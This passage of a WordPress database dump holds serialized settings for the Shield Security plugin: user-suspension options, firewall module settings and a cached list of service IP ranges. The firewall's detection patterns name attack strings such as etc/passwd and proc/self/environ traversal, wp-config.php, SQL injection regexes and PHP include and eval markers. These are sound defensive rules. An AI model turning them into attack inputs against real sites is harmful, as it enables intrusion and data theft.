specified.\";}i:15;a:10:{s:3:\"key\";s:14:\"manual_suspend\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:19:\"https://shsec.io/fq\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:4:\"name\";s:28:\"Allow Manual User Suspension\";s:7:\"summary\";s:47:\"Manually Suspend User Accounts To Prevent Login\";s:11:\"description\";s:58:\"Users may be suspended by administrators to prevent login.\";}i:16;a:10:{s:3:\"key\";s:13:\"auto_password\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/fs\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:4:\"name\";s:30:\"Auto-Suspend Expired Passwords\";s:7:\"summary\";s:50:\"Automatically Suspend Users With Expired Passwords\";s:11:\"description\";s:63:\"Suspend login by users and require password reset to unsuspend.\";}i:17;a:11:{s:3:\"key\";s:14:\"auto_idle_days\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;s:9:\"link_info\";s:19:\"https://shsec.io/ft\";s:9:\"link_blog\";s:19:\"https://shsec.io/fr\";s:4:\"name\";s:23:\"Auto-Suspend Idle Users\";s:7:\"summary\";s:40:\"Automatically Suspend Idle User Accounts\";s:11:\"description\";s:68:\"Prevent login by idle users and require password reset to unsuspend.\";}i:18;a:10:{s:3:\"key\";s:15:\"auto_idle_roles\";s:7:\"section\";s:15:\"section_suspend\";s:7:\"premium\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:3:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";}s:9:\"link_info\";s:19:\"https://shsec.io/ft\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:23:\"Auto-Suspend Idle Users\";s:7:\"summary\";s:40:\"Automatically Suspend Idle User Accounts\";s:11:\"description\";s:68:\"Prevent login by idle users and require password reset to unsuspend.\";}i:19;a:5:{s:3:\"key\";s:27:\"autoadd_sessions_started_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:20;a:5:{s:3:\"key\";s:22:\"hard_suspended_userids\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:3:{s:29:\"pwned_api_url_password_single\";s:45:\"https://api.pwnedpasswords.com/pwnedpassword/\";s:28:\"pwned_api_url_password_range\";s:37:\"https://api.pwnedpasswords.com/range/\";s:6:\"events\";a:12:{s:16:\"session_notfound\";a:0:{}s:15:\"session_expired\";a:0:{}s:12:\"session_idle\";a:0:{}s:14:\"session_iplock\";a:0:{}s:19:\"session_browserlock\";a:0:{}s:18:\"session_unverified\";a:0:{}s:16:\"password_expired\";a:0:{}s:28:\"password_policy_force_change\";a:1:{s:6:\"recent\";b:1;}s:21:\"password_policy_block\";a:1:{s:6:\"recent\";b:1;}s:19:\"user_hard_suspended\";a:1:{s:6:\"recent\";b:1;}s:21:\"user_hard_unsuspended\";a:0:{}s:17:\"reg_email_invalid\";a:1:{s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420381,'shield_mod_config_e0ce0f03379bf671b03928a2cd660f1a','a:6:{s:4:\"slug\";s:8:\"firewall\";s:10:\"properties\";a:14:{s:4:\"slug\";s:8:\"firewall\";s:4:\"name\";s:8:\"Firewall\";s:12:\"sidebar_name\";s:8:\"Firewall\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:8:\"firewall\";s:7:\"tagline\";s:61:\"Automatically block malicious URLs and data sent to your site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:30;}s:8:\"sections\";a:6:{i:0;a:5:{s:4:\"slug\";s:33:\"section_firewall_blocking_options\";s:7:\"primary\";b:1;s:5:\"title\";s:25:\"Firewall Blocking Options\";s:11:\"title_short\";s:17:\"Firewall Blocking\";s:7:\"summary\";a:2:{i:0;s:56:\"Here you choose what kind of malicious data to scan for.\";i:1;s:198:\"Recommendation - Turn on as many options here as you can. If you find an incompatibility or something stops working, un-check 1 option at a time until you find the problem or review the Audit Trail.\";}}i:1;a:4:{s:4:\"slug\";s:38:\"section_choose_firewall_block_response\";s:5:\"title\";s:30:\"Choose Firewall Block Response\";s:11:\"title_short\";s:17:\"Firewall Response\";s:7:\"summary\";a:2:{i:0;s:75:\"Here you choose how the plugin will respond when it detects malicious data.\";i:1;s:54:\"Recommendation - Choose the option \'Die With Message\'.\";}}i:2;a:4:{s:4:\"slug\";s:17:\"section_whitelist\";s:5:\"title\";s:71:\"Whitelists - IPs, Pages, Parameters, and Users that bypass the Firewall\";s:11:\"title_short\";s:9:\"Whitelist\";s:7:\"summary\";a:2:{i:0;s:124:\"In principle you should not need to whitelist anything or anyone unless you have discovered a collision with another plugin.\";i:1;s:90:\"Recommendation - Do not whitelist anything unless you are confident in what you are doing.\";}}i:3;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:4;a:4:{s:4:\"slug\";s:48:\"section_enable_plugin_feature_wordpress_firewall\";s:5:\"title\";s:23:\"Enable Module: Firewall\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:123:\"Purpose - The Firewall is designed to analyse data sent to your website and block any requests that appear to be malicious.\";i:1;s:53:\"Recommendation - Keep the Firewall feature turned on.\";}}i:5;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:15:{i:0;a:10:{s:3:\"key\";s:15:\"enable_firewall\";s:7:\"section\";s:48:\"section_enable_plugin_feature_wordpress_firewall\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/43\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf01\";s:4:\"name\";s:15:\"Enable Firewall\";s:7:\"summary\";s:39:\"Enable (or Disable) The Firewall module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Firewall module\";}i:1;a:10:{s:3:\"key\";s:21:\"include_cookie_checks\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Include Cookies\";s:7:\"summary\";s:41:\"Also Test Cookie Values In Firewall Tests\";s:11:\"description\";s:95:\"The firewall tests GET and POST, but with this option checked it will also check COOKIE values.\";}i:2;a:9:{s:3:\"key\";s:19:\"block_dir_traversal\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Directory Traversals\";s:7:\"summary\";s:26:\"Block Directory Traversals\";s:11:\"description\";s:71:\"This will block directory traversal paths in in application parameters.\";}i:3;a:9:{s:3:\"key\";s:17:\"block_sql_queries\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"SQL Queries\";s:7:\"summary\";s:17:\"Block SQL Queries\";s:11:\"description\";s:46:\"This will block SQL in application parameters.\";}i:4;a:9:{s:3:\"key\";s:21:\"block_wordpress_terms\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"WordPress Terms\";s:7:\"summary\";s:30:\"Block WordPress Specific Terms\";s:11:\"description\";s:91:\"This will block WordPress specific terms in application parameters (wp_, user_login, etc.).\";}i:5;a:9:{s:3:\"key\";s:22:\"block_field_truncation\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Field Truncation\";s:7:\"summary\";s:30:\"Block Field Truncation Attacks\";s:11:\"description\";s:66:\"This will block field truncation attacks in application parameters\";}i:6;a:9:{s:3:\"key\";s:14:\"block_php_code\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:8:\"PHP Code\";s:7:\"summary\";s:23:\"Block PHP Code Includes\";s:11:\"description\";s:132:\"This will block any data that appears to try and include PHP files. Will probably block saving within the Plugin/Theme file editors.\";}i:7;a:9:{s:3:\"key\";s:22:\"block_exe_file_uploads\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Exe File Uploads\";s:7:\"summary\";s:29:\"Block Executable File Uploads\";s:11:\"description\";s:59:\"This will block executable file uploads (.php, .exe, etc.).\";}i:8;a:10:{s:3:\"key\";s:20:\"block_leading_schema\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Leading Schemas\";s:7:\"summary\";s:36:\"Block Leading Schemas (HTTPS / HTTP)\";s:11:\"description\";s:135:\"This will block leading schemas http:// and https:// in application parameters (off by default; may cause problems with other plugins).\";}i:9;a:10:{s:3:\"key\";s:16:\"block_aggressive\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Aggressive Scan\";s:7:\"summary\";s:23:\"Aggressively Block Data\";s:11:\"description\";s:159:\"Employs a set of aggressive rules to detect and block malicious data submitted to your site. Warning - May cause an increase in false-positive firewall blocks.\";}i:10;a:11:{s:3:\"key\";s:14:\"block_response\";s:7:\"section\";s:38:\"section_choose_firewall_block_response\";s:8:\"advanced\";b:1;s:7:\"default\";s:20:\"redirect_die_message\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:20:\"redirect_die_message\";s:4:\"text\";s:16:\"Die With Message\";}i:1;a:2:{s:9:\"value_key\";s:12:\"redirect_die\";s:4:\"text\";s:3:\"Die\";}i:2;a:2:{s:9:\"value_key\";s:13:\"redirect_home\";s:4:\"text\";s:21:\"Redirect To Home Page\";}i:3;a:2:{s:9:\"value_key\";s:12:\"redirect_404\";s:4:\"text\";s:10:\"Return 404\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Block Response\";s:7:\"summary\";s:50:\"How the firewall responds when it blocks a request\";s:11:\"description\";s:100:\"We recommend dying with a message so you know what might have occurred when the firewall blocks you.\";}i:11;a:9:{s:3:\"key\";s:16:\"block_send_email\";s:7:\"section\";s:38:\"section_choose_firewall_block_response\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Send Email Report\";s:7:\"summary\";s:89:\"When a visitor is blocked the firewall will send an email to the configured email address\";s:11:\"description\";s:124:\"Use with caution - if you get hit by automated bots you may send out too many emails and you could get blocked by your host.\";}i:12;a:10:{s:3:\"key\";s:21:\"page_params_whitelist\";s:7:\"section\";s:17:\"section_whitelist\";s:8:\"advanced\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:21:\"comma_separated_lists\";s:9:\"link_info\";s:19:\"https://shsec.io/2a\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Whitelist Parameters\";s:7:\"summary\";s:74:\"Detail pages and parameters that are whitelisted (ignored by the firewall)\";s:11:\"description\";s:104:\"This should be used with caution and you should only provide parameter names that you must have excluded\";}i:13;a:10:{s:3:\"key\";s:16:\"whitelist_admins\";s:7:\"section\";s:17:\"section_whitelist\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Ignore Administrators\";s:7:\"summary\";s:21:\"Ignore Administrators\";s:11:\"description\";s:78:\"Authenticated administrator users will not be processed by the firewall rules.\";}i:14;a:11:{s:3:\"key\";s:16:\"text_firewalldie\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Firewall Block Message\";s:7:\"summary\";s:63:\"Message Displayed To Visitor When A Firewall Block Is Triggered\";s:11:\"description\";s:102:\"When you select the option to display a message to the visitor, this is the message that is displayed.\";}}s:11:\"definitions\";a:3:{s:17:\"default_whitelist\";a:14:{s:29:\"/wp-admin/options-general.php\";a:0:{}s:21:\"/wp-admin/options.php\";a:2:{i:0;s:4:\"home\";i:1;s:7:\"siteurl\";}s:21:\"/wp-admin/plugins.php\";a:1:{i:0;s:6:\"plugin\";}s:22:\"/wp-admin/post-new.php\";a:0:{}s:22:\"/wp-admin/page-new.php\";a:0:{}s:22:\"/wp-admin/link-add.php\";a:0:{}s:26:\"/wp-admin/media-upload.php\";a:0:{}s:19:\"/wp-admin/admin.php\";a:1:{i:0;s:4:\"page\";}s:18:\"/wp-admin/post.php\";a:1:{i:0;s:7:\"content\";}s:27:\"/wp-admin/plugin-editor.php\";a:1:{i:0;s:10:\"newcontent\";}s:18:\"/wp-admin/page.php\";a:0:{}s:24:\"/wp-admin/admin-ajax.php\";a:0:{}s:21:\"/wp-comments-post.php\";a:2:{i:0;s:3:\"url\";i:1;s:7:\"comment\";}s:1:\"*\";a:25:{i:0;s:12:\"affwp_action\";i:1;s:7:\"ajaxurl\";i:2;s:20:\"g-recaptcha-response\";i:3;s:11:\"verify_sign\";i:4;s:6:\"txn_id\";i:5;s:15:\"wp_http_referer\";i:6;s:16:\"_wp_http_referer\";i:7;s:25:\"_wp_original_http_referer\";i:8;s:11:\"JCS_INENREF\";i:9;s:5:\"pass1\";i:10;s:10:\"pass1-text\";i:11;s:3:\"pwd\";i:12;s:3:\"url\";i:13;s:10:\"referredby\";i:14;s:11:\"redirect_to\";i:15;s:28:\"jetpack_sso_original_request\";i:16;s:23:\"jetpack_sso_redirect_to\";i:17;s:33:\"/^wordpress_logged_in_[0-9a-f]+$/\";i:18;s:10:\"edd_action\";i:19;s:12:\"edd_redirect\";i:20;s:10:\"wpcf7-form\";i:21;s:20:\"yoast_wpseo_metadesc\";i:22;s:26:\"icwp_wpsf_new_u2f_response\";i:23;s:17:\"icwp_wpsf_u2f_otp\";i:24;s:5:\"appId\";}}s:17:\"firewall_patterns\";a:8:{s:12:\"dirtraversal\";a:1:{s:6:\"simple\";a:8:{i:0;s:10:\"etc/passwd\";i:1;s:17:\"proc/self/environ\";i:2;s:10:\"etc/passwd\";i:3;s:8:\"makefile\";i:4;s:7:\"wwwroot\";i:5;s:10:\"pingserver\";i:6;s:3:\"../\";i:7;s:8:\"loopback\";}}s:7:\"wpterms\";a:2:{s:6:\"simple\";a:2:{i:0;s:4:\"/**/\";i:1;s:13:\"wp-config.php\";}s:5:\"regex\";a:3:{i:0;s:4:\"^wp_\";i:1;s:11:\"^user_login\";i:2;s:10:\"^user_pass\";}}s:15:\"fieldtruncation\";a:1:{s:5:\"regex\";a:2:{i:0;s:7:\"\\s{49,}\";i:1;s:4:\"\\x00\";}}s:10:\"sqlqueries\";a:1:{s:5:\"regex\";a:3:{i:0;s:11:\"concat\\s*\\(\";i:1;s:12:\"group_concat\";i:2;s:13:\"union.*select\";}}s:7:\"exefile\";a:1:{s:5:\"regex\";a:1:{i:0;s:86:\"\\.(dll|rb|py|exe|php[3-6]?|pl|perl|ph[34]|phl|phtml|phtm|sql|ini|jsp|asp|git|svn|tar)$\";}}s:6:\"schema\";a:2:{s:6:\"simple\";a:1:{i:0;s:6:\".shtml\";}s:5:\"regex\";a:1:{i:0;s:23:\"^(http|https|ftp|file):\";}}s:7:\"phpcode\";a:2:{s:6:\"simple\";N;s:5:\"regex\";a:1:{i:0;s:52:\"(include|include_once|require|require_once)\\s*\\(.*\\)\";}}s:10:\"aggressive\";a:2:{s:6:\"simple\";a:11:{i:0;s:5:\"eval(\";i:1;s:6:\"(null)\";i:2;s:7:\"base64_\";i:3;s:9:\"localhost\";i:4;s:10:\"(function(\";i:5;s:8:\"{x.html(\";i:6;s:7:\").html(\";i:7;s:3:\"...\";i:8;s:10:\"/httpdocs/\";i:9;s:5:\"/tmp/\";i:10;s:8:\"boot.ini\";}s:5:\"regex\";a:5:{i:0;s:16:\"GLOBALS(=|\\[|%%)\";i:1;s:16:\"REQUEST(=|\\[|%%)\";i:2;s:24:\"(`|\\<|\\>|\\[|\\]|\\{|\\}|\\?)\";i:3;s:32:\"drop\\s+table\\s+(`|\'?)[a-z0-9]+\\1\";i:4;s:53:\"\'\\s+OR\\s+\'([a-z0-9]+)\'\\s*=\\s*\'\\1\'\\s+(--|\\(\\{|\\/\\*)\\s+\";}}}s:6:\"events\";a:12:{s:10:\"check_skip\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}s:14:\"firewall_block\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:23:\"blockparam_dirtraversal\";a:1:{s:3:\"cat\";i:3;}s:18:\"blockparam_wpterms\";a:1:{s:3:\"cat\";i:3;}s:26:\"blockparam_fieldtruncation\";a:1:{s:3:\"cat\";i:3;}s:21:\"blockparam_sqlqueries\";a:1:{s:3:\"cat\";i:3;}s:17:\"blockparam_schema\";a:1:{s:3:\"cat\";i:3;}s:21:\"blockparam_aggressive\";a:1:{s:3:\"cat\";i:3;}s:18:\"blockparam_phpcode\";a:1:{s:3:\"cat\";i:3;}s:13:\"block_exefile\";a:1:{s:3:\"cat\";i:3;}s:13:\"fw_email_fail\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}s:16:\"fw_email_success\";a:1:{s:4:\"stat\";b:0;}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(418799,'aptoweb_can_trans_confirmed','Y','yes'),(509858,'_site_transient_timeout_serviceips_all','1632760769','no'),(509859,'_site_transient_serviceips_all','a:12:{s:10:\"cloudflare\";a:2:{i:4;a:15:{i:0;s:15:\"173.245.48.0/20\";i:1;s:15:\"103.21.244.0/22\";i:2;s:15:\"103.22.200.0/22\";i:3;s:13:\"103.31.4.0/22\";i:4;s:15:\"141.101.64.0/18\";i:5;s:16:\"108.162.192.0/18\";i:6;s:15:\"190.93.240.0/20\";i:7;s:15:\"188.114.96.0/20\";i:8;s:16:\"197.234.240.0/22\";i:9;s:15:\"198.41.128.0/17\";i:10;s:14:\"162.158.0.0/15\";i:11;s:13:\"104.16.0.0/13\";i:12;s:13:\"104.24.0.0/14\";i:13;s:13:\"172.64.0.0/13\";i:14;s:13:\"131.0.72.0/22\";}i:6;a:7:{i:0;s:14:\"2400:cb00::/32\";i:1;s:14:\"2606:4700::/32\";i:2;s:14:\"2803:f800::/32\";i:3;s:14:\"2405:b500::/32\";i:4;s:14:\"2405:8100::/32\";i:5;s:14:\"2a06:98c0::/29\";i:6;s:14:\"2c0f:f248::/32\";}}s:10:\"duckduckgo\";a:2:{i:4;a:12:{i:0;s:12:\"23.21.227.69\";i:1;s:12:\"40.88.21.235\";i:2;s:13:\"50.16.241.113\";i:3;s:13:\"50.16.241.114\";i:4;s:13:\"50.16.241.117\";i:5;s:13:\"50.16.247.234\";i:6;s:12:\"52.204.97.54\";i:7;s:11:\"52.5.190.19\";i:8;s:14:\"54.197.234.188\";i:9;s:14:\"54.208.100.253\";i:10;s:13:\"54.208.102.37\";i:11;s:10:\"107.21.1.8\";}i:6;a:0:{}}s:8:\"gtmetrix\";a:2:{i:4;a:66:{i:0;s:14:\"52.162.212.163\";i:1;s:12:\"13.78.216.56\";i:2;s:13:\"65.52.113.236\";i:3;s:14:\"52.229.122.240\";i:4;s:14:\"172.255.48.147\";i:5;s:14:\"172.255.48.146\";i:6;s:14:\"172.255.48.145\";i:7;s:14:\"172.255.48.144\";i:8;s:14:\"172.255.48.143\";i:9;s:14:\"172.255.48.142\";i:10;s:14:\"24.109.190.162\";i:11;s:14:\"172.255.48.141\";i:12;s:14:\"172.255.48.140\";i:13;s:14:\"172.255.48.139\";i:14;s:14:\"172.255.48.138\";i:15;s:14:\"172.255.48.137\";i:16;s:14:\"172.255.48.136\";i:17;s:14:\"172.255.48.135\";i:18;s:14:\"172.255.48.134\";i:19;s:14:\"172.255.48.133\";i:20;s:14:\"172.255.48.132\";i:21;s:14:\"172.255.48.131\";i:22;s:14:\"172.255.48.130\";i:23;s:14:\"104.214.48.247\";i:24;s:13:\"40.74.243.176\";i:25;s:12:\"40.74.243.13\";i:26;s:13:\"40.74.242.253\";i:27;s:11:\"13.85.82.26\";i:28;s:11:\"13.85.24.90\";i:29;s:11:\"13.85.24.83\";i:30;s:10:\"13.66.7.11\";i:31;s:14:\"104.214.72.101\";i:32;s:14:\"191.235.99.221\";i:33;s:14:\"191.235.98.164\";i:34;s:11:\"104.41.2.19\";i:35;s:14:\"104.211.165.53\";i:36;s:13:\"104.211.143.8\";i:37;s:13:\"172.255.61.40\";i:38;s:13:\"172.255.61.39\";i:39;s:13:\"172.255.61.38\";i:40;s:13:\"172.255.61.37\";i:41;s:13:\"172.255.61.36\";i:42;s:13:\"172.255.61.35\";i:43;s:13:\"172.255.61.34\";i:44;s:12:\"20.52.146.77\";i:45;s:12:\"65.52.36.250\";i:46;s:12:\"70.37.83.240\";i:47;s:15:\"104.214.110.135\";i:48;s:14:\"157.55.189.189\";i:49;s:14:\"191.232.194.51\";i:50;s:12:\"52.175.57.81\";i:51;s:14:\"52.237.236.145\";i:52;s:13:\"52.237.250.73\";i:53;s:14:\"52.237.235.185\";i:54;s:12:\"40.83.89.214\";i:55;s:13:\"40.123.218.94\";i:56;s:14:\"102.133.169.66\";i:57;s:12:\"52.172.14.87\";i:58;s:14:\"52.231.199.170\";i:59;s:14:\"52.246.165.153\";i:60;s:12:\"13.76.97.224\";i:61;s:11:\"13.53.162.7\";i:62;s:11:\"20.52.36.49\";i:63;s:13:\"20.188.63.151\";i:64;s:14:\"51.144.102.233\";i:65;s:12:\"23.96.34.105\";}i:6;a:0:{}}s:10:\"icontrolwp\";a:2:{i:4;a:5:{i:0;s:13:\"23.253.32.180\";i:1;s:12:\"23.253.56.59\";i:2;s:13:\"23.253.62.185\";i:3;s:15:\"104.130.217.172\";i:4;s:12:\"198.61.176.9\";}i:6;a:8:{i:0;s:39:\"2001:4801:7817:0072:ca75:cc9b:ff10:4699\";i:1;s:37:\"2001:4801:7817:72:ca75:cc9b:ff10:4699\";i:2;s:39:\"2001:4801:7822:0103:be76:4eff:fe10:89a9\";i:3;s:38:\"2001:4801:7822:103:be76:4eff:fe10:89a9\";i:4;s:39:\"2001:4801:7824:0101:ca75:cc9b:ff10:a7b2\";i:5;s:38:\"2001:4801:7824:101:ca75:cc9b:ff10:a7b2\";i:6;s:39:\"2001:4801:7828:0101:be76:4eff:fe11:9cd6\";i:7;s:38:\"2001:4801:7828:101:be76:4eff:fe11:9cd6\";}}s:8:\"managewp\";a:2:{i:4;a:51:{i:0;s:13:\"34.211.180.66\";i:1;s:12:\"54.70.65.107\";i:2;s:12:\"34.210.224.7\";i:3;s:11:\"52.41.5.108\";i:4;s:12:\"52.35.72.129\";i:5;s:14:\"35.162.254.253\";i:6;s:12:\"52.11.12.231\";i:7;s:11:\"52.11.29.70\";i:8;s:12:\"52.11.54.161\";i:9;s:13:\"52.24.142.159\";i:10;s:13:\"52.25.191.255\";i:11;s:13:\"52.27.181.126\";i:12;s:13:\"52.34.126.117\";i:13;s:12:\"52.34.254.47\";i:14;s:11:\"52.35.82.99\";i:15;s:11:\"52.36.28.80\";i:16;s:12:\"52.38.106.97\";i:17;s:13:\"52.39.177.152\";i:18;s:13:\"52.41.230.148\";i:19;s:12:\"52.41.237.12\";i:20;s:13:\"52.42.126.166\";i:21;s:11:\"52.43.13.71\";i:22;s:12:\"52.43.76.224\";i:23;s:12:\"52.88.96.110\";i:24;s:12:\"52.89.155.51\";i:25;s:13:\"54.148.73.118\";i:26;s:13:\"54.186.37.105\";i:27;s:12:\"54.187.92.57\";i:28;s:12:\"54.191.32.65\";i:29;s:12:\"54.191.67.23\";i:30;s:13:\"54.191.80.119\";i:31;s:14:\"54.191.135.209\";i:32;s:14:\"54.191.136.176\";i:33;s:13:\"54.191.137.17\";i:34;s:13:\"54.191.148.85\";i:35;s:12:\"54.191.149.8\";i:36;s:12:\"52.26.122.21\";i:37;s:12:\"52.24.187.29\";i:38;s:12:\"52.89.85.107\";i:39;s:14:\"54.186.128.167\";i:40;s:13:\"54.191.40.136\";i:41;s:11:\"52.24.62.11\";i:42;s:13:\"52.88.119.122\";i:43;s:14:\"54.191.148.225\";i:44;s:13:\"54.191.151.18\";i:45;s:12:\"52.89.94.121\";i:46;s:13:\"52.25.116.116\";i:47;s:13:\"52.88.215.225\";i:48;s:14:\"54.186.143.184\";i:49;s:13:\"52.88.197.180\";i:50;s:13:\"52.27.171.126\";}i:6;a:0:{}}s:8:\"nodeping\";a:2:{i:4;a:29:{i:1;s:15:\"104.247.192.170\";i:3;s:12:\"136.175.8.15\";i:5;s:14:\"107.161.26.107\";i:7;s:13:\"172.105.6.187\";i:9;s:14:\"173.248.161.42\";i:11;s:13:\"66.11.113.250\";i:13;s:13:\"172.93.197.58\";i:15;s:13:\"172.82.138.70\";i:17;s:15:\"209.205.207.243\";i:19;s:12:\"66.23.202.26\";i:21;s:11:\"64.79.76.50\";i:23;s:14:\"208.82.130.170\";i:25;s:15:\"192.154.102.130\";i:27;s:13:\"5.226.139.158\";i:29;s:14:\"195.154.167.97\";i:31;s:15:\"217.182.201.227\";i:33;s:13:\"37.252.125.64\";i:35;s:12:\"54.36.110.96\";i:37;s:14:\"78.110.173.218\";i:38;s:13:\"95.216.64.250\";i:41;s:13:\"144.48.37.241\";i:43;s:14:\"112.213.38.162\";i:45;s:15:\"172.104.181.238\";i:47;s:11:\"103.6.85.58\";i:49;s:14:\"180.149.230.17\";i:51;s:13:\"203.29.240.44\";i:52;s:15:\"190.104.217.135\";i:53;s:13:\"54.232.120.40\";i:55;s:14:\"162.254.202.35\";}i:6;a:27:{i:0;s:19:\"2607:3f00:11:21::10\";i:2;s:16:\"2605:8340:0:1::2\";i:4;s:19:\"2604:180:1:6e::83b5\";i:6;s:30:\"2600:3c04::f03c:92ff:fe9b:dd03\";i:8;s:19:\"2607:fc88:100:40::2\";i:10;s:20:\"2602:ffc5:105:408::2\";i:12;s:33:\"2602:ffc8:1:14:225:90ff:fee6:8f90\";i:14;s:17:\"2607:3f00:1:a::10\";i:16;s:16:\"2a06:8640:198::2\";i:18;s:21:\"2605:9f80:c000:127::2\";i:20;s:17:\"2001:1828:0:f6::2\";i:22;s:17:\"2604:bf00:214::10\";i:24;s:36:\"2606:c700:4020:17:225:90ff:fe50:390a\";i:26;s:18:\"2a01:4020:1:26::10\";i:28;s:21:\"2001:bc8:2327:110::10\";i:30;s:21:\"2001:41d0:602:4e3::10\";i:32;s:32:\"2a02:2770:5:0:21a:4aff:fe1a:c131\";i:34;s:22:\"2001:41d0:700:1360::10\";i:36;s:21:\"2a01:a500:2604:10::10\";i:39;s:18:\"2a01:4f9:2b:105::2\";i:40;s:34:\"2404:f780:2:950:216:3cff:feb8:ab8e\";i:42;s:32:\"2404:9400:2:0:216:3eff:fee1:bce0\";i:44;s:30:\"2400:8901::f03c:91ff:feb9:fbf4\";i:46;s:21:\"2403:2500:8000:1::ce6\";i:48;s:22:\"2406:d500:9::7a91:9b75\";i:50;s:32:\"2404:9400:4:0:216:3eff:fee1:3c1b\";i:54;s:35:\"2604:bc80:8001:3c:225:90ff:fee5:5c6\";}}s:10:\"paypal_ipn\";a:2:{i:4;a:11:{i:0;s:13:\"66.211.170.66\";i:1;s:10:\"173.0.81.1\";i:2;s:13:\"173.0.81.